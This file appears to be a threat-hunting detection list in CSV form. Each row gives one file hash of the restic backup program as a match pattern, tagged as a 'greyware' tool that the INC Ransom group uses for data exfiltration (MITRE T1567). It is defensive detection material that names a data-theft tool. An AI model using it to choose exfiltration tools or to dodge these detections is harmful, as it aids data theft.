"*78fb147d286d223da111ca67f5e0e2532026e3b24a5c513a109c026ff6f025bd*",".{0,1000}78fb147d286d223da111ca67f5e0e2532026e3b24a5c513a109c026ff6f025bd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*79ade448ca0b6f8b378fa067b60e199a4b5bcbe779397beb1e046f239f60f7e6*",".{0,1000}79ade448ca0b6f8b378fa067b60e199a4b5bcbe779397beb1e046f239f60f7e6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*79f3f7872f14c334104740fc6199ab8eba2a91ddf6f5d2dcbaf6b58ab95362d5*",".{0,1000}79f3f7872f14c334104740fc6199ab8eba2a91ddf6f5d2dcbaf6b58ab95362d5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7a0e3f15d12453d6661ff40e068bfee6df470b531e2a5c434a7f62752fc5ca8b*",".{0,1000}7a0e3f15d12453d6661ff40e068bfee6df470b531e2a5c434a7f62752fc5ca8b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7a7418913aa6c3e5f5def9d79bc027376cbfccaa6bb334f0852bb1beaecbd358*",".{0,1000}7a7418913aa6c3e5f5def9d79bc027376cbfccaa6bb334f0852bb1beaecbd358.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7b4c65fae9cf9cb7ce70928fe6580fa9d077c425e1831958098ebc4537ae16c2*",".{0,1000}7b4c65fae9cf9cb7ce70928fe6580fa9d077c425e1831958098ebc4537ae16c2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7b5719a90750b365cd44f2798f2ccfa7e8ee513214cd9a8b9fee13569ed91683*",".{0,1000}7b5719a90750b365cd44f2798f2ccfa7e8ee513214cd9a8b9fee13569ed91683.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7b603195b50a4b3822f847c97040e2397b0d34eee9fafd60ef6c0fac0c977a29*",".{0,1000}7b603195b50a4b3822f847c97040e2397b0d34eee9fafd60ef6c0fac0c977a29.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7c3e4ff39cf34bd825ddbcbfeae12fc2bc58adcb0f745686392f11963f750604*",".{0,1000}7c3e4ff39cf34bd825ddbcbfeae12fc2bc58adcb0f745686392f11963f750604.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7ca6a195613daefad79766c8e784e3e8adeba912f8467b934523041d63e634f5*",".{0,1000}7ca6a195613daefad79766c8e784e3e8adeba912f8467b934523041d63e634f5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7cdfe04313b09d98da9ab7526c10ebfad98eeefe1b3b6f7a8e35f689a03785df*",".{0,1000}7cdfe04313b09d98da9ab7526c10ebfad98eeefe1b3b6f7a8e35f689a03785df.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7ceaba0911567fe17c4a06f63777411f452783aa8e9eabc3db3858e410e70580*",".{0,1000}7ceaba0911567fe17c4a06f63777411f452783aa8e9eabc3db3858e410e70580.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7d6d7f8fd0a2ecdd1b81934fd7f0670c17d1f6aa2b67ba1b4cb2a214d1c7b480*",".{0,1000}7d6d7f8fd0a2ecdd1b81934fd7f0670c17d1f6aa2b67ba1b4cb2a214d1c7b480.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7ddee6c94a33b7dedd603f12f361d2689ca59b41d6b119a806491ac76497ba9a*",".{0,1000}7ddee6c94a33b7dedd603f12f361d2689ca59b41d6b119a806491ac76497ba9a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7df4f0da54f3adc731f24f971d41040a2922a9822aa3b0a596b545502a638ef3*",".{0,1000}7df4f0da54f3adc731f24f971d41040a2922a9822aa3b0a596b545502a638ef3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7e041cc324312bff2d86542c6818e96916caa1e8737ff83cbc39ff9d20fc69f9*",".{0,1000}7e041cc324312bff2d86542c6818e96916caa1e8737ff83cbc39ff9d20fc69f9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7e1562d7995b291237984eafd847c018c8bf8ba1ac3869749a1622f119bbd8bc*",".{0,1000}7e1562d7995b291237984eafd847c018c8bf8ba1ac3869749a1622f119bbd8bc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7e3a066f157ccb8e9fc9319c94561dc9bef52e502d73d9b02c0343f413a8c543*",".{0,1000}7e3a066f157ccb8e9fc9319c94561dc9bef52e502d73d9b02c0343f413a8c543.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7e3d5037f8e2208067518a513ac921d2bc085beb97840f0939a6ef1d24443346*",".{0,1000}7e3d5037f8e2208067518a513ac921d2bc085beb97840f0939a6ef1d24443346.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7e58ac2436868f98276bb647edeb7cae2c5cb68a9d4d4aa152b0c80985a72a3a*",".{0,1000}7e58ac2436868f98276bb647edeb7cae2c5cb68a9d4d4aa152b0c80985a72a3a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7f5d1fdc074adeca5013395f021574003a543c78953ee17a9afe7fc57d628369*",".{0,1000}7f5d1fdc074adeca5013395f021574003a543c78953ee17a9afe7fc57d628369.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7f797dd35843b42edf29a19340387f2bf230275fc7941a1ef2b67468e9c1445b*",".{0,1000}7f797dd35843b42edf29a19340387f2bf230275fc7941a1ef2b67468e9c1445b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7fdc003748c1fa5ff0d87a64aaa8a029927596db53ee09248494aaebe3970179*",".{0,1000}7fdc003748c1fa5ff0d87a64aaa8a029927596db53ee09248494aaebe3970179.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8000e9b99094cdc71aeb1e81ff325681539b44fb3c2ad1b4e68164922b632da0*",".{0,1000}8000e9b99094cdc71aeb1e81ff325681539b44fb3c2ad1b4e68164922b632da0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*80a4f4c0ec5a5397fe7acb53c5e517109ad3a8869440ec0305dd16bb9ee863ea*",".{0,1000}80a4f4c0ec5a5397fe7acb53c5e517109ad3a8869440ec0305dd16bb9ee863ea.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*80aa71e1022cde5a50c19e15148994c1e3218960b0e9a2ba50782711fea564d3*",".{0,1000}80aa71e1022cde5a50c19e15148994c1e3218960b0e9a2ba50782711fea564d3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*80b60adcd06ad0701c0f000d93d52d9bd4147eb0eb17089939b05dea0ae35cfa*",".{0,1000}80b60adcd06ad0701c0f000d93d52d9bd4147eb0eb17089939b05dea0ae35cfa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*80c53e7d1ba179d07e6f7863c80a7acc4bc06801ce08322e82bad7147ae535d2*",".{0,1000}80c53e7d1ba179d07e6f7863c80a7acc4bc06801ce08322e82bad7147ae535d2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8188be37fcc477e98f40d455c59936ba088a9bb32628fa68ea0a3d5c3d6dfc7a*",".{0,1000}8188be37fcc477e98f40d455c59936ba088a9bb32628fa68ea0a3d5c3d6dfc7a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*819fef0b5e052b0f173acbfac84e3e5b672ff5ee789035d02aa813fb5ddcf48f*",".{0,1000}819fef0b5e052b0f173acbfac84e3e5b672ff5ee789035d02aa813fb5ddcf48f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*81a217411829ecaf0af4a391b559a9ab78bb65de31eaa6bac524cc9c58bc4fc3*",".{0,1000}81a217411829ecaf0af4a391b559a9ab78bb65de31eaa6bac524cc9c58bc4fc3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*824cde57cde28cf15e18e2eae0e68dda28ad89c33ddb0d6f01dd999513f35b68*",".{0,1000}824cde57cde28cf15e18e2eae0e68dda28ad89c33ddb0d6f01dd999513f35b68.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*82b2e4933abab5bad7a425ef7122157be4ab660f488f768f719a5b49017cda27*",".{0,1000}82b2e4933abab5bad7a425ef7122157be4ab660f488f768f719a5b49017cda27.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*82c596e4b30f9be61f942b26948a5e51c6910e36073f6c5e531ddca8f60356d1*",".{0,1000}82c596e4b30f9be61f942b26948a5e51c6910e36073f6c5e531ddca8f60356d1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*82e0dfe67afecbff60f4442ca4595984ad82b8515c985857ac067eb4b1737f52*",".{0,1000}82e0dfe67afecbff60f4442ca4595984ad82b8515c985857ac067eb4b1737f52.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*82e8b44fbea744b19d70b11e5c9836526d303680860fa39abed0b69835c64e8a*",".{0,1000}82e8b44fbea744b19d70b11e5c9836526d303680860fa39abed0b69835c64e8a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*83184461da759df6f22da0e53a4a367eccfce3b1e99941521181ce7a03000aaf*",".{0,1000}83184461da759df6f22da0e53a4a367eccfce3b1e99941521181ce7a03000aaf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*832b7b0c67c63fcc6abb02d937a3b631f86a934cdf85879eb1a0da5705b05c65*",".{0,1000}832b7b0c67c63fcc6abb02d937a3b631f86a934cdf85879eb1a0da5705b05c65.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8332935d27f531b6c85fe79f76625220391930506c5debb44895cd8269f58b07*",".{0,1000}8332935d27f531b6c85fe79f76625220391930506c5debb44895cd8269f58b07.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*83415b22a293a7dd3445a721aafbfd17b24e8b3f0864d6a68d3f0f70efff4bd9*",".{0,1000}83415b22a293a7dd3445a721aafbfd17b24e8b3f0864d6a68d3f0f70efff4bd9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8430f80dc17b98fd78aca6f7d635bf12a486687677e15989a891ff4f6d8490a9*",".{0,1000}8430f80dc17b98fd78aca6f7d635bf12a486687677e15989a891ff4f6d8490a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*84b92d2a8ea328fac12eaa92321d3a5c61374f1dc9c7a9a6e150431b11354854*",".{0,1000}84b92d2a8ea328fac12eaa92321d3a5c61374f1dc9c7a9a6e150431b11354854.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*855ebd0013f114417417fea33f17bbad5fb49a588e93ebc0099f0d2d5f7312a9*",".{0,1000}855ebd0013f114417417fea33f17bbad5fb49a588e93ebc0099f0d2d5f7312a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8578d2a63bbedd34669ed4cd8b332fb3aecfd3480ea3ef6d0c692e6fc146cb3e*",".{0,1000}8578d2a63bbedd34669ed4cd8b332fb3aecfd3480ea3ef6d0c692e6fc146cb3e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*85a6408cfb0798dab52335bcb00ac32066376c32daaa75461d43081499bc7de8*",".{0,1000}85a6408cfb0798dab52335bcb00ac32066376c32daaa75461d43081499bc7de8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*86a906672ad815e281944d68af3d0f7e8e48591b727a3215ed06be57dff8b514*",".{0,1000}86a906672ad815e281944d68af3d0f7e8e48591b727a3215ed06be57dff8b514.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*870d0643bce12a91a51947e9fee61b2ccd3b0fd12c21e81bcfcdfd6248f4c287*",".{0,1000}870d0643bce12a91a51947e9fee61b2ccd3b0fd12c21e81bcfcdfd6248f4c287.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8758130f7aa1639b1b2c24c327114657a819c81cdd229a41f56fe9a6550a2b05*",".{0,1000}8758130f7aa1639b1b2c24c327114657a819c81cdd229a41f56fe9a6550a2b05.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*877754ae2d7a31733ab7ee31c4db2159c63c48899bbbf0e7578ae9067c8bfbdb*",".{0,1000}877754ae2d7a31733ab7ee31c4db2159c63c48899bbbf0e7578ae9067c8bfbdb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*878dadc0cd51626f39072cd599be261d184cfe894a4447298449def8588072b8*",".{0,1000}878dadc0cd51626f39072cd599be261d184cfe894a4447298449def8588072b8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*879f2aff6d65c4ce886ccd74508a38dc49d4be49c37b98b88af45fb0f908e865*",".{0,1000}879f2aff6d65c4ce886ccd74508a38dc49d4be49c37b98b88af45fb0f908e865.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*88165b5b89b6064df37a9964d660f40ac62db51d6536e459db9aaea6f2b2fc11*",".{0,1000}88165b5b89b6064df37a9964d660f40ac62db51d6536e459db9aaea6f2b2fc11.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*886e67a861f34bcd7094cc4d2bb989d0c3aaf594d11a21fc11d4ffefe136f47f*",".{0,1000}886e67a861f34bcd7094cc4d2bb989d0c3aaf594d11a21fc11d4ffefe136f47f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*887151c88c3be897947ce3159096518d452d30e1006b850a65d951387d2358d3*",".{0,1000}887151c88c3be897947ce3159096518d452d30e1006b850a65d951387d2358d3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*887b0d18cc4158752105774b5b332ab290a51f08e2602b5c140bc2b1368d1b79*",".{0,1000}887b0d18cc4158752105774b5b332ab290a51f08e2602b5c140bc2b1368d1b79.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*888fc4f6a333cad871710fca2227c37bef771323826c5c414492d653858db10a*",".{0,1000}888fc4f6a333cad871710fca2227c37bef771323826c5c414492d653858db10a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*88f70507c3d00c6db0700498561444ba6ca5eff3afff4e0eecf96e7ac3668230*",".{0,1000}88f70507c3d00c6db0700498561444ba6ca5eff3afff4e0eecf96e7ac3668230.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*89866c382c09e09e89fe8548c3cf51c64784c914ab2b308ad7820ec6b2758e91*",".{0,1000}89866c382c09e09e89fe8548c3cf51c64784c914ab2b308ad7820ec6b2758e91.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*89b8fdbc6fab18b4544efbfd2c7929e02f5d5ba66942e8550098f43111b79a6c*",".{0,1000}89b8fdbc6fab18b4544efbfd2c7929e02f5d5ba66942e8550098f43111b79a6c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8a1df785e99e5bee6541eda2597872088228699c8877d83e5dabe94b07a63828*",".{0,1000}8a1df785e99e5bee6541eda2597872088228699c8877d83e5dabe94b07a63828.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8b870f77cc8e76422967eb08ea3c420e7f85a8dc689a0b4d66a4d307c20916fd*",".{0,1000}8b870f77cc8e76422967eb08ea3c420e7f85a8dc689a0b4d66a4d307c20916fd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8beb7234aac02e5ca176c452da12725723691ca186c241953ed4b15643619f58*",".{0,1000}8beb7234aac02e5ca176c452da12725723691ca186c241953ed4b15643619f58.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8bfe709bb0bb6d4e6976492ee41860bb06da468dd6baa268beaf6ba089c0a263*",".{0,1000}8bfe709bb0bb6d4e6976492ee41860bb06da468dd6baa268beaf6ba089c0a263.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8c1c0d5652d1d4a77c1c48526fa46eedbaf2d57b96b5a9e632c2b4917449a912*",".{0,1000}8c1c0d5652d1d4a77c1c48526fa46eedbaf2d57b96b5a9e632c2b4917449a912.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
